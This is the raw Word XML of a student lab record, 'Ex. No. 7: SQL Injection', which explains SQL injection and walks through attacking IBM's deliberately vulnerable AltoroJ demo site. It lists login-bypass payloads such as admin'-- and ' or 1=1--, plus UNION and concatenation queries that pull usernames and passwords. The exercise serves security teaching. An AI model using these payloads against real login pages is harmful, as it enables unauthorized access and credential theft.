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92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7"/>
        <w:gridCol w:w="8476"/>
      </w:tblGrid>
      <w:tr w:rsidR="000576D2" w:rsidRPr="000576D2" w14:paraId="3D1CE9B0" w14:textId="77777777" w:rsidTr="002E7A9C">
        <w:trPr>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1447" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C1BB618" w14:textId="35CF99E5" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="00A421B4" w:rsidP="002E7A9C">
            <w:pPr>
              <w:spacing w:after="0"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 xml:space="preserve">Ex. No. </w:t>
            </w:r>
            <w:r w:rsidR="00AA2469">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8476" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E256EEA" w14:textId="45D1DE20" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="00AA2469" w:rsidP="002E7A9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA2469">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000576D2" w:rsidRPr="000576D2" w14:paraId="1B6F1FC4" w14:textId="77777777" w:rsidTr="002E7A9C">
        <w:trPr>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1447" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="193DE73F" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="00A421B4" w:rsidP="002E7A9C">
            <w:pPr>
              <w:spacing w:after="0"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Date of Exercise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8476" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76DD1B59" w14:textId="40CC0798" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="006257BC" w:rsidP="002E7A9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A2469">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/10/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56DCED98" w14:textId="77777777" w:rsidR="002E7A9C" w:rsidRDefault="002E7A9C" w:rsidP="00087950">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652F6DB4" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRDefault="002E7A9C" w:rsidP="00AA246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sidR="00AA2469" w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6161F" w14:textId="199ADD7B" w:rsidR="006257BC"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In this experiment, our target will be a vulnerable web site</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AltoroJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> website is published by IBM Corporation for the sole purpose of demonstrating the effectiveness of IBM products in detecting web application vulnerabilities and website defects. We will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection to find login credentials. [SQL injection Attack]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B03C99" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301E0559" w14:textId="1365CE83" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">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Lab Environment: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF060F" w14:textId="147753AE" w:rsidR="00AA2469" w:rsidRP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To carry out the Experiment, you need:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112842B9" w14:textId="40D1F69A" w:rsidR="00AA2469" w:rsidRP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w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Penetration testing operating system [ Kali Linux / parrot]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50945B71" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Web browser with Internet access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11224CD5" w14:textId="6684ECA5" w:rsid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w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Administration privileges to run the tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D696D9" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C279F1A" w14:textId="29E3523C" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">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Description: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E550D" w14:textId="33C8B122" w:rsid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 xml:space="preserve">SQL (Structured Query Language) injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can be done by injecting malicious SQL code into a web form or parameter. If the application is not properly sanitized, the attacker's code will be executed by the database, potentially giving them access to sensitive data or even allowing them to take control of the database. SQL injection attacks can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">used to: Steal data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> data, Take control of the database. SQL injection attacks are one of the most common types of web attacks, and they can be very serious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34163DB9" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E4F08C" w14:textId="128FDCCC" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EECFB68" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Go to the site testfire.net </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475A8BC" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Go the login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D719F9" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C5207" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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For ex: 1. Line Comments SQL Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3B7F2" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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Username: admin'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4C435" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F082AD9" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2760C1F1" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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2. String Concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCFECF" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">+ (S) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C83740" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">SELECT login + '-' + password FROM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>members</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CFC42E1" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">|| (*MO) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E8728" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">SELECT login || '-' || password FROM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>members</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40B3E611" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508E0087" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Union Injections </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B71986" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">SELECT header, txt FROM news UNION ALL SELECT   name, pass FROM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>members</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="755B2BC1" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Bypassing Login Screens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA718A" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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lastRenderedPageBreak/>
        <w:t>admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D2A0A9" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A51F4" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6E053" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64688C18" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D35A8D" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4580ED" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 or '1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FFCA8" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRP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 or ('1'='1—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6B5ACE" w14:textId="21B849B3" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   We will use the bypass login technique to perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9EA80" w14:textId="78E497B0" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76215B79" w14:textId="340A40B3" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4970">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55A7E8EB" wp14:editId="73723802">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>66675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2079625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2918713" cy="1569856"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="3" name="Picture 3" descr="A login screen with blue text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in screen with blue text and green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18713" cy="1569856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009F4970">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E86DE12" wp14:editId="27023886">
            <wp:extent cx="5340985"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85" cy="1840580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1DE6D" w14:textId="29F6B95C" w:rsidR="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
